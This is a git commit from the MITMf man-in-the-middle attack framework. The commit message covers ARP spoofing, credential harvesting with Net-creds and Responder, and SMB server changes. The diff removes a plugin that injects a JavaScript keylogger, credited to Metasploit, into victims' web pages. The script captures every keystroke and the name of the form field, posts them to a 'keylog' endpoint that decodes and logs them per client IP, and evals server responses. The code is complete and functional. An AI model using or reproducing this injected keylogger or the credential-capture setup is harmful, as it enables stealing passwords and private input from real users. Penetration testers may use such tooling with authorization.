This is 1/2 of the work done... lot's of cool stuff!

I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds. - Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all. - Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code) - The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2) - An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons: 1) Impacket is moving towards SMB2 support and is actively developed 2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file) 3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out) - Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!) - Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable. - POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use) - Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out) - Some plugins are missing because I'm currently re-writing them, will be added later - Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/
2025-07-07 05:22:15 -07:00 · 2015-04-27 18:33:55 +02:00 · 2015-04-27 18:33:55 +02:00 · 9712eed4a3
commit 9712eed4a3
parent 663f38e732
92 changed files with 6883 additions and 3349 deletions
--- a/plugins/JsKeylogger.py
+++ b/plugins/JsKeylogger.py
@ -1,169 +0,0 @@
-#!/usr/bin/env python2.7
-
-# Copyright (c) 2014-2016 Marcello Salvati
-#
-# This program is free software; you can redistribute it and/or
-# modify it under the terms of the GNU General Public License as
-# published by the Free Software Foundation; either version 3 of the
-# License, or (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
-# USA
-#
-
-from plugins.plugin import Plugin
-from plugins.Inject import Inject
-import logging
-
-mitmf_logger = logging.getLogger('mitmf')
-
-class jskeylogger(Inject, Plugin):
-    name       = "Javascript Keylogger"
-    optname    = "jskeylogger"
-    desc       = "Injects a javascript keylogger into clients webpages"
-    implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
-    depends    = ["Inject"]
-    version    = "0.2"
-    has_opts   = False
-
-    def initialize(self, options):
-        Inject.initialize(self, options)
-        self.html_payload = self.msf_keylogger()
-
-    def sendPostData(self, request):
-        #Handle the plugin output
-        if 'keylog' in request.uri:
-
-            raw_keys = request.postData.split("&&")[0]
-            keys = raw_keys.split(",")
-            del keys[0]; del(keys[len(keys)-1])
-
-            input_field = request.postData.split("&&")[1]            
-
-            nice = ''
-            for n in keys:
-                if n == '9':
-                    nice += "<TAB>"
-                elif n == '8':
-                    nice = nice.replace(nice[-1:], "")
-                elif n == '13':
-                    nice = ''
-                else:
-                    try:
-                        nice += n.decode('hex')
-                    except:
-                        mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
-
-            #try:
-            #     input_field = input_field.decode('hex')
-            #except:
-            #    mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
-            
-            mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
-
-    def msf_keylogger(self):
-        #Stolen from the Metasploit module http_javascript_keylogger
-
-        payload = """<script type="text/javascript">
-window.onload = function mainfunc(){
-var2 = ",";
-name = '';
-function make_xhr(){
-    var xhr;
-            try {
-                xhr = new XMLHttpRequest();
-            } catch(e) {
-                try {
-                    xhr = new ActiveXObject("Microsoft.XMLHTTP");
-                } catch(e) {
-                    xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
-                }
-            }
-            if(!xhr) {
-                throw "failed to create XMLHttpRequest";
-            }
-            return xhr;
-        }
-        
-        xhr = make_xhr();
-        xhr.onreadystatechange = function() {
-            if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
-                eval(xhr.responseText);
-            }
-        }
-
-if (window.addEventListener) {
-document.addEventListener('keypress', function2, true);
-document.addEventListener('keydown', function1, true);
-} else if (window.attachEvent) {
-document.attachEvent('onkeypress', function2);
-document.attachEvent('onkeydown', function1);
-} else {
-document.onkeypress = function2;
-document.onkeydown = function1;
-}
-
-}
-
-function function2(e)
-{
-    srcname = window.event.srcElement.name;
-    var3 = (window.event) ? window.event.keyCode : e.which;
-    var3 = var3.toString(16);
-    
-    if (var3 != "d")
-    {
-        andxhr(var3, srcname);
-    }
-}
-
-function function1(e)
-{
-    srcname = window.event.srcElement.name;
-    id = window.event.srcElement.id;
-
-    var3 = (window.event) ? window.event.keyCode : e.which;
-    if (var3 == 9 || var3 == 8 || var3 == 13)
-    {
-        andxhr(var3, srcname);
-    }
-    else if (var3 == 0)
-    {
-        
-        text = document.getElementById(id).value;
-        if (text.length != 0)
-        {   
-            andxhr(text.toString(16), srcname);
-        }
-    } 
-}
-
-function andxhr(key, inputName)
-{   
-    if (inputName != name)
-    {
-        name = inputName;
-        var2 = ",";
-    }
-
-    var2= var2 + key + ",";
-
-    xhr.open("POST", "keylog", true);
-    xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
-    xhr.send(var2 + '&&' + inputName);
-    
-    if (key == 13 || var2.length > 3000)
-    {
-        var2 = ",";
-    }
-}
-</script>"""
-
-        return payload